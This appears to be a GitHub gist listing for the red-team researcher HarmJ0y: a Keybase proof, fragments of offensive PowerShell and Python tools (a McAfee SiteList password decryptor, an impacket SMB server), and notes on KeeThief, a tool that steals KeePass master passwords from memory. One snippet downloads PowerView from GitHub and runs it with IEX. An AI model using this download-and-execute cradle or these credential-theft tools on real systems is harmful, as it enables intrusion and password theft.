HarmJ0y

HarmJ0y

HarmJ0y

### Keybase proof

I hereby claim:

  * I am harmj0y on github.
  * I am harmj0y (https://keybase.io/harmj0y) on keybase.
  * I have a public key whose fingerprint is FFD5 77A3 2B3A 2B41 11F4  383A FA2F 9AA5 3110 89D3

To claim this, I am signing this object:

HarmJ0y

function Translate-Canonical {
    <#
    .SYNOPSIS
    Converts a user@fqdn to NT4 format.
    .LINK
    http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats
    #>
    [CmdletBinding()]
    param(
        [String]$User

HarmJ0y

function Get-DecryptedSitelistPassword {
    # PowerShell adaptation of https://github.com/funoverip/mcafee-sitelist-pwd-decryption/
    # Original Author: Jerome Nokin (@funoverip / jerome.nokin@gmail.com)
    # port by @harmj0y
    [CmdletBinding()]
    Param (
        [Parameter(Mandatory = $True)]
        [String]
        $B64Pass
    )

HarmJ0y

#!/usr/bin/python

from impacket import smbserver
import sys, argparse, threading, ConfigParser, time, os


class ThreadedSMBServer(threading.Thread):
    """
    Threaded SMB server that can be spun up locally.
    """

HarmJ0y

$RSA = New-RSAKeyPair

# local tests
$ComputerName = 'localhost'
$StorePath = 'C:\Temp\temp.bin'
Write-Host "`n[$ComputerName] AES Storepath : $StorePath"
".\secret.txt" | Write-EncryptedStore -StorePath $StorePath -Key 'Password123!'
Read-EncryptedStore -StorePath $StorePath -Key 'Password123!' -List
Get-EncryptedStoreData -StorePath $StorePath | Remove-EncryptedStore

HarmJ0y

$GroupData = @{}
$UserData = @{}
$ServerData = @{}

Import-CSV .\DomainGroups.csv | ForEach-Object {
    if($GroupData[$_.GroupName]) {
        $_.GroupName = $GroupData[$_.GroupName]
    }
    else {
        $guid = ([guid]::NewGuid()).Guid

HarmJ0y

Add-Type -AssemblyName System.Security
$Content = (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')

$Bytes = ([Text.Encoding]::ASCII).GetBytes($Content)
$EncryptedBytes = [Security.Cryptography.ProtectedData]::Protect($Bytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine)

IEX (([Text.Encoding]::ASCII).GetString([Security.Cryptography.ProtectedData]::Unprotect($EncryptedBytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine)))

HarmJ0y

A few clarification points for the "KeeThief – A Case Study in Attacking KeePass Part 2" post:

1. KeeThief doesn't require local administrator rights, only rights to access the KeePass.exe process space you're targeting.

2. KeeThief.ps1 is fully-self self-contained (no dependencies and no files dropped to disk) and PowerShell Version 2 compliant (so it will work on Windows 7+).

3. Secure desktop doesn't matter/come into play as a keylogger isn't used or needed.

4. This approach is different from KeeFarce - KeeThief recovers the plaintext master password and other key material from memory instead of calling internal methods to export the database contents.